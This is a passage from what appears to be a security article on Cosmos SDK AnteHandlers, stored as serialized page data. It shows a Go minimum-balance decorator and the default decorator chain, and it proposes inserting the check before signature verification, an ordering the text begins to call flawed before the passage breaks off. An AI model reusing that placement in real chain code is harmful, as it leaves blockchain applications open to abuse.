execution.",{"type":28,"tag":29,"props":78157,"children":78158},{},[78159,78160,78166],{"type":33,"value":16275},{"type":28,"tag":98,"props":78161,"children":78163},{"className":78162},[],[78164],{"type":33,"value":78165},"AnteHandle",{"type":33,"value":78167}," implementation may look something like this:",{"type":28,"tag":234,"props":78169,"children":78171},{"code":78170,"language":75784,"meta":7,"className":75785,"style":7},"const (\n    MIN_BALANCE = 100\n)\n\nfunc (abd AccountBalanceDecorator) AnteHandle(\n    ctx sdk.Context,\n    tx sdk.Tx,\n    simulate bool,\n    next sdk.AnteHandler,\n) (sdk.Context, error) {\n    sigTx, ok := tx.(authsigning.SigVerifiableTx)\n    if !ok {\n        return ctx, errorsmod.Wrap(\n            sdkerrors.ErrTxDecode,\n            \"invalid tx type\",\n        )\n    }\n\n    signers := sigTx.GetSigners()\n    for i, signer := range signers {\n        balance := abd.bk.getBalance(ctx, signer, ATOM)\n        if balance.Amount \u003C MIN_BALANCE {\n            return ctx, errorsmod.Wrap(\n                ErrInsufficientBalance,\n                \"Insufficient Balance\",\n            )\n        }\n    }\n\n    return next(ctx, tx, simulate)\n}\n",[78172],{"type":28,"tag":98,"props":78173,"children":78174},{"__ignoreMap":7},[78175,78187,78203,78210,78217,78250,78274,78299,78315,78339,78371,78419,78438,78471,78492,78504,78511,78518,78525,78555,78591,78655,78689,78720,78732,78744,78751,78758,78765,78772,78814],{"type":28,"tag":116,"props":78176,"children":78177},{"class":245,"line":246},[78178,78182],{"type":28,"tag":116,"props":78179,"children":78180},{"style":376},[78181],{"type":33,"value":9323},{"type":28,"tag":116,"props":78183,"children":78184},{"style":266},[78185],{"type":33,"value":78186}," (\n",{"type":28,"tag":116,"props":78188,"children":78189},{"class":245,"line":256},[78190,78195,78199],{"type":28,"tag":116,"props":78191,"children":78192},{"style":272},[78193],{"type":33,"value":78194},"    MIN_BALANCE",{"type":28,"tag":116,"props":78196,"children":78197},{"style":370},[78198],{"type":33,"value":2226},{"type":28,"tag":116,"props":78200,"children":78201},{"style":350},[78202],{"type":33,"value":19006},{"type":28,"tag":116,"props":78204,"children":78205},{"class":245,"line":293},[78206],{"type":28,"tag":116,"props":78207,"children":78208},{"style":266},[78209],{"type":33,"value":2830},{"type":28,"tag":116,"props":78211,"children":78212},{"class":245,"line":361},[78213],{"type":28,"tag":116,"props":78214,"children":78215},{"emptyLinePlaceholder":19},[78216],{"type":33,"value":1044},{"type":28,"tag":116,"props":78218,"children":78219},{"class":245,"line":387},[78220,78224,78228,78233,78238,78242,78246],{"type":28,"tag":116,"props":78221,"children":78222},{"style":376},[78223],{"type":33,"value":75920},{"type":28,"tag":116,"props":78225,"children":78226},{"style":266},[78227],{"type":33,"value":269},{"type":28,"tag":116,"props":78229,"children":78230},{"style":272},[78231],{"type":33,"value":78232},"abd ",{"type":28,"tag":116,"props":78234,"children":78235},{"style":339},[78236],{"type":33,"value":78237},"AccountBalanceDecorator",{"type":28,"tag":116,"props":78239,"children":78240},{"style":266},[78241],{"type":33,"value":1609},{"type":28,"tag":116,"props":78243,"children":78244},{"style":282},[78245],{"type":33,"value":78165},{"type":28,"tag":116,"props":78247,"children":78248},{"style":266},[78249],{"type":33,"value":3133},{"type":28,"tag":116,"props":78251,"children":78252},{"class":245,"line":400},[78253,78257,78262,78266,78270],{"type":28,"tag":116,"props":78254,"children":78255},{"style":272},[78256],{"type":33,"value":19887},{"type":28,"tag":116,"props":78258,"children":78259},{"style":339},[78260],{"type":33,"value":78261}," sdk",{"type":28,"tag":116,"props":78263,"children":78264},{"style":266},[78265],{"type":33,"value":141},{"type":28,"tag":116,"props":78267,"children":78268},{"style":339},[78269],{"type":33,"value":75969},{"type":28,"tag":116,"props":78271,"children":78272},{"style":266},[78273],{"type":33,"value":3178},{"type":28,"tag":116,"props":78275,"children":78276},{"class":245,"line":614},[78277,78282,78286,78290,78295],{"type":28,"tag":116,"props":78278,"children":78279},{"style":272},[78280],{"type":33,"value":78281},"    tx",{"type":28,"tag":116,"props":78283,"children":78284},{"style":339},[78285],{"type":33,"value":78261},{"type":28,"tag":116,"props":78287,"children":78288},{"style":266},[78289],{"type":33,"value":141},{"type":28,"tag":116,"props":78291,"children":78292},{"style":339},[78293],{"type":33,"value":78294},"Tx",{"type":28,"tag":116,"props":78296,"children":78297},{"style":266},[78298],{"type":33,"value":3178},{"type":28,"tag":116,"props":78300,"children":78301},{"class":245,"line":631},[78302,78307,78311],{"type":28,"tag":116,"props":78303,"children":78304},{"style":272},[78305],{"type":33,"value":78306},"    simulate",{"type":28,"tag":116,"props":78308,"children":78309},{"style":339},[78310],{"type":33,"value":11718},{"type":28,"tag":116,"props":78312,"children":78313},{"style":266},[78314],{"type":33,"value":3178},{"type":28,"tag":116,"props":78316,"children":78317},{"class":245,"line":665},[78318,78323,78327,78331,78335],{"type":28,"tag":116,"props":78319,"children":78320},{"style":272},[78321],{"type":33,"value":78322},"    next",{"type":28,"tag":116,"props":78324,"children":78325},{"style":339},[78326],{"type":33,"value":78261},{"type":28,"tag":116,"props":78328,"children":78329},{"style":266},[78330],{"type":33,"value":141},{"type":28,"tag":116,"props":78332,"children":78333},{"style":339},[78334],{"type":33,"value":78090},{"type":28,"tag":116,"props":78336,"children":78337},{"style":266},[78338],{"type":33,"value":3178},{"type":28,"tag":116,"props":78340,"children":78341},{"class":245,"line":713},[78342,78346,78351,78355,78359,78363,78367],{"type":28,"tag":116,"props":78343,"children":78344},{"style":266},[78345],{"type":33,"value":76002},{"type":28,"tag":116,"props":78347,"children":78348},{"style":339},[78349],{"type":33,"value":78350},"sdk",{"type":28,"tag":116,"props":78352,"children":78353},{"style":266},[78354],{"type":33,"value":141},{"type":28,"tag":116,"props":78356,"children":78357},{"style":339},[78358],{"type":33,"value":75969},{"type":28,"tag":116,"props":78360,"children":78361},{"style":266},[78362],{"type":33,"value":825},{"type":28,"tag":116,"props":78364,"children":78365},{"style":339},[78366],{"type":33,"value":974},{"type":28,"tag":116,"props":78368,"children":78369},{"style":266},[78370],{"type":33,"value":844},{"type":28,"tag":116,"props":78372,"children":78373},{"class":245,"line":750},[78374,78379,78383,78388,78392,78396,78401,78406,78410,78415],{"type":28,"tag":116,"props":78375,"children":78376},{"style":272},[78377],{"type":33,"value":78378},"    sigTx",{"type":28,"tag":116,"props":78380,"children":78381},{"style":266},[78382],{"type":33,"value":825},{"type":28,"tag":116,"props":78384,"children":78385},{"style":272},[78386],{"type":33,"value":78387},"ok",{"type":28,"tag":116,"props":78389,"children":78390},{"style":370},[78391],{"type":33,"value":76036},{"type":28,"tag":116,"props":78393,"children":78394},{"style":272},[78395],{"type":33,"value":67648},{"type":28,"tag":116,"props":78397,"children":78398},{"style":266},[78399],{"type":33,"value":78400},".(",{"type":28,"tag":116,"props":78402,"children":78403},{"style":339},[78404],{"type":33,"value":78405},"authsigning",{"type":28,"tag":116,"props":78407,"children":78408},{"style":266},[78409],{"type":33,"value":141},{"type":28,"tag":116,"props":78411,"children":78412},{"style":339},[78413],{"type":33,"value":78414},"SigVerifiableTx",{"type":28,"tag":116,"props":78416,"children":78417},{"style":266},[78418],{"type":33,"value":2830},{"type":28,"tag":116,"props":78420,"children":78421},{"class":245,"line":779},[78422,78426,78430,78434],{"type":28,"tag":116,"props":78423,"children":78424},{"style":260},[78425],{"type":33,"value":11947},{"type":28,"tag":116,"props":78427,"children":78428},{"style":370},[78429],{"type":33,"value":12530},{"type":28,"tag":116,"props":78431,"children":78432},{"style":272},[78433],{"type":33,"value":78387},{"type":28,"tag":116,"props":78435,"children":78436},{"style":266},[78437],{"type":33,"value":1291},{"type":28,"tag":116,"props":78439,"children":78440},{"class":245,"line":796},[78441,78445,78449,78453,78458,78462,78467],{"type":28,"tag":116,"props":78442,"children":78443},{"style":260},[78444],{"type":33,"value":15405},{"type":28,"tag":116,"props":78446,"children":78447},{"style":272},[78448],{"type":33,"value":25498},{"type":28,"tag":116,"props":78450,"children":78451},{"style":266},[78452],{"type":33,"value":825},{"type":28,"tag":116,"props":78454,"children":78455},{"style":272},[78456],{"type":33,"value":78457},"errorsmod",{"type":28,"tag":116,"props":78459,"children":78460},{"style":266},[78461],{"type":33,"value":141},{"type":28,"tag":116,"props":78463,"children":78464},{"style":282},[78465],{"type":33,"value":78466},"Wrap",{"type":28,"tag":116,"props":78468,"children":78469},{"style":266},[78470],{"type":33,"value":3133},{"type":28,"tag":116,"props":78472,"children":78473},{"class":245,"line":847},[78474,78479,78483,78488],{"type":28,"tag":116,"props":78475,"children":78476},{"style":272},[78477],{"type":33,"value":78478},"            sdkerrors",{"type":28,"tag":116,"props":78480,"children":78481},{"style":266},[78482],{"type":33,"value":141},{"type":28,"tag":116,"props":78484,"children":78485},{"style":272},[78486],{"type":33,"value":78487},"ErrTxDecode",{"type":28,"tag":116,"props":78489,"children":78490},{"style":266},[78491],{"type":33,"value":3178},{"type":28,"tag":116,"props":78493,"children":78494},{"class":245,"line":898},[78495,78500],{"type":28,"tag":116,"props":78496,"children":78497},{"style":563},[78498],{"type":33,"value":78499},"            \"invalid tx type\"",{"type":28,"tag":116,"props":78501,"children":78502},{"style":266},[78503],{"type":33,"value":3178},{"type":28,"tag":116,"props":78505,"children":78506},{"class":245,"line":907},[78507],{"type":28,"tag":116,"props":78508,"children":78509},{"style":266},[78510],{"type":33,"value":67941},{"type":28,"tag":116,"props":78512,"children":78513},{"class":245,"line":981},[78514],{"type":28,"tag":116,"props":78515,"children":78516},{"style":266},[78517],{"type":33,"value":3025},{"type":28,"tag":116,"props":78519,"children":78520},{"class":245,"line":1011},[78521],{"type":28,"tag":116,"props":78522,"children":78523},{"emptyLinePlaceholder":19},[78524],{"type":33,"value":1044},{"type":28,"tag":116,"props":78526,"children":78527},{"class":245,"line":1029},[78528,78533,78537,78542,78546,78551],{"type":28,"tag":116,"props":78529,"children":78530},{"style":272},[78531],{"type":33,"value":78532},"    signers",{"type":28,"tag":116,"props":78534,"children":78535},{"style":370},[78536],{"type":33,"value":76036},{"type":28,"tag":116,"props":78538,"children":78539},{"style":272},[78540],{"type":33,"value":78541}," sigTx",{"type":28,"tag":116,"props":78543,"children":78544},{"style":266},[78545],{"type":33,"value":141},{"type":28,"tag":116,"props":78547,"children":78548},{"style":282},[78549],{"type":33,"value":78550},"GetSigners",{"type":28,"tag":116,"props":78552,"children":78553},{"style":266},[78554],{"type":33,"value":7407},{"type":28,"tag":116,"props":78556,"children":78557},{"class":245,"line":1038},[78558,78562,78566,78570,78574,78578,78582,78587],{"type":28,"tag":116,"props":78559,"children":78560},{"style":260},[78561],{"type":33,"value":2703},{"type":28,"tag":116,"props":78563,"children":78564},{"style":272},[78565],{"type":33,"value":3068},{"type":28,"tag":116,"props":78567,"children":78568},{"style":266},[78569],{"type":33,"value":825},{"type":28,"tag":116,"props":78571,"children":78572},{"style":272},[78573],{"type":33,"value":6818},{"type":28,"tag":116,"props":78575,"children":78576},{"style":370},[78577],{"type":33,"value":76036},{"type":28,"tag":116,"props":78579,"children":78580},{"style":260},[78581],{"type":33,"value":77019},{"type":28,"tag":116,"props":78583,"children":78584},{"style":272},[78585],{"type":33,"value":78586}," signers",{"type":28,"tag":116,"props":78588,"children":78589},{"style":266},[78590],{"type":33,"value":1291},{"type":28,"tag":116,"props":78592,"children":78593},{"class":245,"line":1047},[78594,78599,78603,78608,78612,78617,78621,78626,78630,78634,78638,78642,78646,78651],{"type":28,"tag":116,"props":78595,"children":78596},{"style":272},[78597],{"type":33,"value":78598},"        balance",{"type":28,"tag":116,"props":78600,"children":78601},{"style":370},[78602],{"type":33,"value":76036},{"type":28,"tag":116,"props":78604,"children":78605},{"style":272},[78606],{"type":33,"value":78607}," abd",{"type":28,"tag":116,"props":78609,"children":78610},{"style":266},[78611],{"type":33,"value":141},{"type":28,"tag":116,"props":78613,"children":78614},{"style":272},[78615],{"type":33,"value":78616},"bk",{"type":28,"tag":116,"props":78618,"children":78619},{"style":266},[78620],{"type":33,"value":141},{"type":28,"tag":116,"props":78622,"children":78623},{"style":282},[78624],{"type":33,"value":78625},"getBalance",{"type":28,"tag":116,"props":78627,"children":78628},{"style":266},[78629],{"type":33,"value":313},{"type":28,"tag":116,"props":78631,"children":78632},{"style":272},[78633],{"type":33,"value":19944},{"type":28,"tag":116,"props":78635,"children":78636},{"style":266},[78637],{"type":33,"value":825},{"type":28,"tag":116,"props":78639,"children":78640},{"style":272},[78641],{"type":33,"value":6818},{"type":28,"tag":116,"props":78643,"children":78644},{"style":266},[78645],{"type":33,"value":825},{"type":28,"tag":116,"props":78647,"children":78648},{"style":272},[78649],{"type":33,"value":78650},"ATOM",{"type":28,"tag":116,"props":78652,"children":78653},{"style":266},[78654],{"type":33,"value":2830},{"type":28,"tag":116,"props":78656,"children":78657},{"class":245,"line":1071},[78658,78662,78667,78671,78676,78680,78685],{"type":28,"tag":116,"props":78659,"children":78660},{"style":260},[78661],{"type":33,"value":2943},{"type":28,"tag":116,"props":78663,"children":78664},{"style":272},[78665],{"type":33,"value":78666}," balance",{"type":28,"tag":116,"props":78668,"children":78669},{"style":266},[78670],{"type":33,"value":141},{"type":28,"tag":116,"props":78672,"children":78673},{"style":272},[78674],{"type":33,"value":78675},"Amount",{"type":28,"tag":116,"props":78677,"children":78678},{"style":370},[78679],{"type":33,"value":8391},{"type":28,"tag":116,"props":78681,"children":78682},{"style":272},[78683],{"type":33,"value":78684}," MIN_BALANCE",{"type":28,"tag":116,"props":78686,"children":78687},{"style":266},[78688],{"type":33,"value":1291},{"type":28,"tag":116,"props":78690,"children":78691},{"class":245,"line":1137},[78692,78696,78700,78704,78708,78712,78716],{"type":28,"tag":116,"props":78693,"children":78694},{"style":260},[78695],{"type":33,"value":1017},{"type":28,"tag":116,"props":78697,"children":78698},{"style":272},[78699],{"type":33,"value":25498},{"type":28,"tag":116,"props":78701,"children":78702},{"style":266},[78703],{"type":33,"value":825},{"type":28,"tag":116,"props":78705,"children":78706},{"style":272},[78707],{"type":33,"value":78457},{"type":28,"tag":116,"props":78709,"children":78710},{"style":266},[78711],{"type":33,"value":141},{"type":28,"tag":116,"props":78713,"children":78714},{"style":282},[78715],{"type":33,"value":78466},{"type":28,"tag":116,"props":78717,"children":78718},{"style":266},[78719],{"type":33,"value":3133},{"type":28,"tag":116,"props":78721,"children":78722},{"class":245,"line":1181},[78723,78728],{"type":28,"tag":116,"props":78724,"children":78725},{"style":272},[78726],{"type":33,"value":78727},"                ErrInsufficientBalance",{"type":28,"tag":116,"props":78729,"children":78730},{"style":266},[78731],{"type":33,"value":3178},{"type":28,"tag":116,"props":78733,"children":78734},{"class":245,"line":1212},[78735,78740],{"type":28,"tag":116,"props":78736,"children":78737},{"style":563},[78738],{"type":33,"value":78739},"                \"Insufficient Balance\"",{"type":28,"tag":116,"props":78741,"children":78742},{"style":266},[78743],{"type":33,"value":3178},{"type":28,"tag":116,"props":78745,"children":78746},{"class":245,"line":1254},[78747],{"type":28,"tag":116,"props":78748,"children":78749},{"style":266},[78750],{"type":33,"value":77135},{"type":28,"tag":116,"props":78752,"children":78753},{"class":245,"line":1262},[78754],{"type":28,"tag":116,"props":78755,"children":78756},{"style":266},[78757],{"type":33,"value":1954},{"type":28,"tag":116,"props":78759,"children":78760},{"class":245,"line":1294},[78761],{"type":28,"tag":116,"props":78762,"children":78763},{"style":266},[78764],{"type":33,"value":3025},{"type":28,"tag":116,"props":78766,"children":78767},{"class":245,"line":1334},[78768],{"type":28,"tag":116,"props":78769,"children":78770},{"emptyLinePlaceholder":19},[78771],{"type":33,"value":1044},{"type":28,"tag":116,"props":78773,"children":78774},{"class":245,"line":1372},[78775,78779,78784,78788,78792,78796,78801,78805,78810],{"type":28,"tag":116,"props":78776,"children":78777},{"style":260},[78778],{"type":33,"value":393},{"type":28,"tag":116,"props":78780,"children":78781},{"style":282},[78782],{"type":33,"value":78783}," next",{"type":28,"tag":116,"props":78785,"children":78786},{"style":266},[78787],{"type":33,"value":313},{"type":28,"tag":116,"props":78789,"children":78790},{"style":272},[78791],{"type":33,"value":19944},{"type":28,"tag":116,"props":78793,"children":78794},{"style":266},[78795],{"type":33,"value":825},{"type":28,"tag":116,"props":78797,"children":78798},{"style":272},[78799],{"type":33,"value":78800},"tx",{"type":28,"tag":116,"props":78802,"children":78803},{"style":266},[78804],{"type":33,"value":825},{"type":28,"tag":116,"props":78806,"children":78807},{"style":272},[78808],{"type":33,"value":78809},"simulate",{"type":28,"tag":116,"props":78811,"children":78812},{"style":266},[78813],{"type":33,"value":2830},{"type":28,"tag":116,"props":78815,"children":78816},{"class":245,"line":1381},[78817],{"type":28,"tag":116,"props":78818,"children":78819},{"style":266},[78820],{"type":33,"value":406},{"type":28,"tag":29,"props":78822,"children":78823},{},[78824,78826,78831,78833,78839,78841,78847],{"type":33,"value":78825},"Where should this custom ",{"type":28,"tag":98,"props":78827,"children":78829},{"className":78828},[],[78830],{"type":33,"value":78090},{"type":33,"value":78832}," be placed relative to other ",{"type":28,"tag":98,"props":78834,"children":78836},{"className":78835},[],[78837],{"type":33,"value":78838},"AnteHandlers",{"type":33,"value":78840}," provided by cosmos-sdk?\nConsidering that we are only concerned with transactions that satisfy our check, inserting it right after the ",{"type":28,"tag":98,"props":78842,"children":78844},{"className":78843},[],[78845],{"type":33,"value":78846},"SetUpContextDecorator",{"type":33,"value":78848}," should work, right?",{"type":28,"tag":29,"props":78850,"children":78851},{},[78852],{"type":28,"tag":87,"props":78853,"children":78856},{"href":78854,"rel":78855},"https://github.com/cosmos/cosmos-sdk/blob/f0aec3f30dd952e1b4b3a5b25e0412c1af5baaac/x/auth/ante/ante.go#L41",[91],[78857],{"type":33,"value":76359},{"type":28,"tag":234,"props":78859,"children":78861},{"code":78860,"language":75784,"meta":7,"className":75785,"style":7},"anteDecorators := []sdk.AnteDecorator{\n    NewSetUpContextDecorator(), // outermost AnteDecorator. SetUpContext must be called first\n    // INSERT HERE\n    NewExtensionOptionsDecorator(options.ExtensionOptionChecker),\n    NewValidateBasicDecorator(),\n    NewTxTimeoutHeightDecorator(),\n    NewValidateMemoDecorator(options.AccountKeeper),\n    NewConsumeGasForTxSizeDecorator(options.AccountKeeper),\n    NewDeductFeeDecorator(options.AccountKeeper, options.BankKeeper, options.FeegrantKeeper, options.TxFeeChecker),\n    NewSetPubKeyDecorator(options.AccountKeeper), // SetPubKeyDecorator must be called before all signature verification decorators\n    NewValidateSigCountDecorator(options.AccountKeeper),\n    NewSigGasConsumeDecorator(options.AccountKeeper, options.SigGasConsumer),\n    NewSigVerificationDecorator(options.AccountKeeper, options.SignModeHandler),\n    NewIncrementSequenceDecorator(options.AccountKeeper),\n}\n",[78862],{"type":28,"tag":98,"props":78863,"children":78864},{"__ignoreMap":7},[78865,78898,78915,78923,78952,78964,78976,79005,79033,79112,79145,79173,79218,79263,79291],{"type":28,"tag":116,"props":78866,"children":78867},{"class":245,"line":246},[78868,78873,78877,78881,78885,78889,78894],{"type":28,"tag":116,"props":78869,"children":78870},{"style":272},[78871],{"type":33,"value":78872},"anteDecorators",{"type":28,"tag":116,"props":78874,"children":78875},{"style":370},[78876],{"type":33,"value":76036},{"type":28,"tag":116,"props":78878,"children":78879},{"style":266},[78880],{"type":33,"value":75847},{"type":28,"tag":116,"props":78882,"children":78883},{"style":339},[78884],{"type":33,"value":78350},{"type":28,"tag":116,"props":78886,"children":78887},{"style":266},[78888],{"type":33,"value":141},{"type":28,"tag":116,"props":78890,"children":78891},{"style":339},[78892],{"type":33,"value":78893},"AnteDecorator",{"type":28,"tag":116,"props":78895,"children":78896},{"style":266},[78897],{"type":33,"value":10547},{"type":28,"tag":116,"props":78899,"children":78900},{"class":245,"line":256},[78901,78906,78910],{"type":28,"tag":116,"props":78902,"children":78903},{"style":282},[78904],{"type":33,"value":78905},"    NewSetUpContextDecorator",{"type":28,"tag":116,"props":78907,"children":78908},{"style":266},[78909],{"type":33,"value":18038},{"type":28,"tag":116,"props":78911,"children":78912},{"style":250},[78913],{"type":33,"value":78914},"// outermost AnteDecorator. SetUpContext must be called first\n",{"type":28,"tag":116,"props":78916,"children":78917},{"class":245,"line":293},[78918],{"type":28,"tag":116,"props":78919,"children":78920},{"style":250},[78921],{"type":33,"value":78922},"    // INSERT HERE\n",{"type":28,"tag":116,"props":78924,"children":78925},{"class":245,"line":361},[78926,78931,78935,78939,78943,78948],{"type":28,"tag":116,"props":78927,"children":78928},{"style":282},[78929],{"type":33,"value":78930},"    NewExtensionOptionsDecorator",{"type":28,"tag":116,"props":78932,"children":78933},{"style":266},[78934],{"type":33,"value":313},{"type":28,"tag":116,"props":78936,"children":78937},{"style":272},[78938],{"type":33,"value":35664},{"type":28,"tag":116,"props":78940,"children":78941},{"style":266},[78942],{"type":33,"value":141},{"type":28,"tag":116,"props":78944,"children":78945},{"style":272},[78946],{"type":33,"value":78947},"ExtensionOptionChecker",{"type":28,"tag":116,"props":78949,"children":78950},{"style":266},[78951],{"type":33,"value":6408},{"type":28,"tag":116,"props":78953,"children":78954},{"class":245,"line":387},[78955,78960],{"type":28,"tag":116,"props":78956,"children":78957},{"style":282},[78958],{"type":33,"value":78959},"    NewValidateBasicDecorator",{"type":28,"tag":116,"props":78961,"children":78962},{"style":266},[78963],{"type":33,"value":3161},{"type":28,"tag":116,"props":78965,"children":78966},{"class":245,"line":400},[78967,78972],{"type":28,"tag":116,"props":78968,"children":78969},{"style":282},[78970],{"type":33,"value":78971},"    NewTxTimeoutHeightDecorator",{"type":28,"tag":116,"props":78973,"children":78974},{"style":266},[78975],{"type":33,"value":3161},{"type":28,"tag":116,"props":78977,"children":78978},{"class":245,"line":614},[78979,78984,78988,78992,78996,79001],{"type":28,"tag":116,"props":78980,"children":78981},{"style":282},[78982],{"type":33,"value":78983},"    NewValidateMemoDecorator",{"type":28,"tag":116,"props":78985,"children":78986},{"style":266},[78987],{"type":33,"value":313},{"type":28,"tag":116,"props":78989,"children":78990},{"style":272},[78991],{"type":33,"value":35664},{"type":28,"tag":116,"props":78993,"children":78994},{"style":266},[78995],{"type":33,"value":141},{"type":28,"tag":116,"props":78997,"children":78998},{"style":272},[78999],{"type":33,"value":79000},"AccountKeeper",{"type":28,"tag":116,"props":79002,"children":79003},{"style":266},[79004],{"type":33,"value":6408},{"type":28,"tag":116,"props":79006,"children":79007},{"class":245,"line":631},[79008,79013,79017,79021,79025,79029],{"type":28,"tag":116,"props":79009,"children":79010},{"style":282},[79011],{"type":33,"value":79012},"    NewConsumeGasForTxSizeDecorator",{"type":28,"tag":116,"props":79014,"children":79015},{"style":266},[79016],{"type":33,"value":313},{"type":28,"tag":116,"props":79018,"children":79019},{"style":272},[79020],{"type":33,"value":35664},{"type":28,"tag":116,"props":79022,"children":79023},{"style":266},[79024],{"type":33,"value":141},{"type":28,"tag":116,"props":79026,"children":79027},{"style":272},[79028],{"type":33,"value":79000},{"type":28,"tag":116,"props":79030,"children":79031},{"style":266},[79032],{"type":33,"value":6408},{"type":28,"tag":116,"props":79034,"children":79035},{"class":245,"line":665},[79036,79041,79045,79049,79053,79057,79061,79065,79069,79074,79078,79082,79086,79091,79095,79099,79103,79108],{"type":28,"tag":116,"props":79037,"children":79038},{"style":282},[79039],{"type":33,"value":79040},"    NewDeductFeeDecorator",{"type":28,"tag":116,"props":79042,"children":79043},{"style":266},[79044],{"type":33,"value":313},{"type":28,"tag":116,"props":79046,"children":79047},{"style":272},[79048],{"type":33,"value":35664},{"type":28,"tag":116,"props":79050,"children":79051},{"style":266},[79052],{"type":33,"value":141},{"type":28,"tag":116,"props":79054,"children":79055},{"style":272},[79056],{"type":33,"value":79000},{"type":28,"tag":116,"props":79058,"children":79059},{"style":266},[79060],{"type":33,"value":825},{"type":28,"tag":116,"props":79062,"children":79063},{"style":272},[79064],{"type":33,"value":35664},{"type":28,"tag":116,"props":79066,"children":79067},{"style":266},[79068],{"type":33,"value":141},{"type":28,"tag":116,"props":79070,"children":79071},{"style":272},[79072],{"type":33,"value":79073},"BankKeeper",{"type":28,"tag":116,"props":79075,"children":79076},{"style":266},[79077],{"type":33,"value":825},{"type":28,"tag":116,"props":79079,"children":79080},{"style":272},[79081],{"type":33,"value":35664},{"type":28,"tag":116,"props":79083,"children":79084},{"style":266},[79085],{"type":33,"value":141},{"type":28,"tag":116,"props":79087,"children":79088},{"style":272},[79089],{"type":33,"value":79090},"FeegrantKeeper",{"type":28,"tag":116,"props":79092,"children":79093},{"style":266},[79094],{"type":33,"value":825},{"type":28,"tag":116,"props":79096,"children":79097},{"style":272},[79098],{"type":33,"value":35664},{"type":28,"tag":116,"props":79100,"children":79101},{"style":266},[79102],{"type":33,"value":141},{"type":28,"tag":116,"props":79104,"children":79105},{"style":272},[79106],{"type":33,"value":79107},"TxFeeChecker",{"type":28,"tag":116,"props":79109,"children":79110},{"style":266},[79111],{"type":33,"value":6408},{"type":28,"tag":116,"props":79113,"children":79114},{"class":245,"line":713},[79115,79120,79124,79128,79132,79136,79140],{"type":28,"tag":116,"props":79116,"children":79117},{"style":282},[79118],{"type":33,"value":79119},"    NewSetPubKeyDecorator",{"type":28,"tag":116,"props":79121,"children":79122},{"style":266},[79123],{"type":33,"value":313},{"type":28,"tag":116,"props":79125,"children":79126},{"style":272},[79127],{"type":33,"value":35664},{"type":28,"tag":116,"props":79129,"children":79130},{"style":266},[79131],{"type":33,"value":141},{"type":28,"tag":116,"props":79133,"children":79134},{"style":272},[79135],{"type":33,"value":79000},{"type":28,"tag":116,"props":79137,"children":79138},{"style":266},[79139],{"type":33,"value":14840},{"type":28,"tag":116,"props":79141,"children":79142},{"style":250},[79143],{"type":33,"value":79144},"// SetPubKeyDecorator must be called before all signature verification decorators\n",{"type":28,"tag":116,"props":79146,"children":79147},{"class":245,"line":750},[79148,79153,79157,79161,79165,79169],{"type":28,"tag":116,"props":79149,"children":79150},{"style":282},[79151],{"type":33,"value":79152},"    NewValidateSigCountDecorator",{"type":28,"tag":116,"props":79154,"children":79155},{"style":266},[79156],{"type":33,"value":313},{"type":28,"tag":116,"props":79158,"children":79159},{"style":272},[79160],{"type":33,"value":35664},{"type":28,"tag":116,"props":79162,"children":79163},{"style":266},[79164],{"type":33,"value":141},{"type":28,"tag":116,"props":79166,"children":79167},{"style":272},[79168],{"type":33,"value":79000},{"type":28,"tag":116,"props":79170,"children":79171},{"style":266},[79172],{"type":33,"value":6408},{"type":28,"tag":116,"props":79174,"children":79175},{"class":245,"line":779},[79176,79181,79185,79189,79193,79197,79201,79205,79209,79214],{"type":28,"tag":116,"props":79177,"children":79178},{"style":282},[79179],{"type":33,"value":79180},"    NewSigGasConsumeDecorator",{"type":28,"tag":116,"props":79182,"children":79183},{"style":266},[79184],{"type":33,"value":313},{"type":28,"tag":116,"props":79186,"children":79187},{"style":272},[79188],{"type":33,"value":35664},{"type":28,"tag":116,"props":79190,"children":79191},{"style":266},[79192],{"type":33,"value":141},{"type":28,"tag":116,"props":79194,"children":79195},{"style":272},[79196],{"type":33,"value":79000},{"type":28,"tag":116,"props":79198,"children":79199},{"style":266},[79200],{"type":33,"value":825},{"type":28,"tag":116,"props":79202,"children":79203},{"style":272},[79204],{"type":33,"value":35664},{"type":28,"tag":116,"props":79206,"children":79207},{"style":266},[79208],{"type":33,"value":141},{"type":28,"tag":116,"props":79210,"children":79211},{"style":272},[79212],{"type":33,"value":79213},"SigGasConsumer",{"type":28,"tag":116,"props":79215,"children":79216},{"style":266},[79217],{"type":33,"value":6408},{"type":28,"tag":116,"props":79219,"children":79220},{"class":245,"line":796},[79221,79226,79230,79234,79238,79242,79246,79250,79254,79259],{"type":28,"tag":116,"props":79222,"children":79223},{"style":282},[79224],{"type":33,"value":79225},"    NewSigVerificationDecorator",{"type":28,"tag":116,"props":79227,"children":79228},{"style":266},[79229],{"type":33,"value":313},{"type":28,"tag":116,"props":79231,"children":79232},{"style":272},[79233],{"type":33,"value":35664},{"type":28,"tag":116,"props":79235,"children":79236},{"style":266},[79237],{"type":33,"value":141},{"type":28,"tag":116,"props":79239,"children":79240},{"style":272},[79241],{"type":33,"value":79000},{"type":28,"tag":116,"props":79243,"children":79244},{"style":266},[79245],{"type":33,"value":825},{"type":28,"tag":116,"props":79247,"children":79248},{"style":272},[79249],{"type":33,"value":35664},{"type":28,"tag":116,"props":79251,"children":79252},{"style":266},[79253],{"type":33,"value":141},{"type":28,"tag":116,"props":79255,"children":79256},{"style":272},[79257],{"type":33,"value":79258},"SignModeHandler",{"type":28,"tag":116,"props":79260,"children":79261},{"style":266},[79262],{"type":33,"value":6408},{"type":28,"tag":116,"props":79264,"children":79265},{"class":245,"line":847},[79266,79271,79275,79279,79283,79287],{"type":28,"tag":116,"props":79267,"children":79268},{"style":282},[79269],{"type":33,"value":79270},"    NewIncrementSequenceDecorator",{"type":28,"tag":116,"props":79272,"children":79273},{"style":266},[79274],{"type":33,"value":313},{"type":28,"tag":116,"props":79276,"children":79277},{"style":272},[79278],{"type":33,"value":35664},{"type":28,"tag":116,"props":79280,"children":79281},{"style":266},[79282],{"type":33,"value":141},{"type":28,"tag":116,"props":79284,"children":79285},{"style":272},[79286],{"type":33,"value":79000},{"type":28,"tag":116,"props":79288,"children":79289},{"style":266},[79290],{"type":33,"value":6408},{"type":28,"tag":116,"props":79292,"children":79293},{"class":245,"line":898},[79294],{"type":28,"tag":116,"props":79295,"children":79296},{"style":266},[79297],{"type":33,"value":406},{"type":28,"tag":29,"props":79299,"children":79300},{},[79301,79303,79308,79310,79316,79317,79323],{"type":33,"value":79302},"Unfortunately, that order wouldn't work. This is because there are other ",{"type":28,"tag":98,"props":79304,"children":79306},{"className":79305},[],[79307],{"type":33,"value":78838},{"type":33,"value":79309},", such as 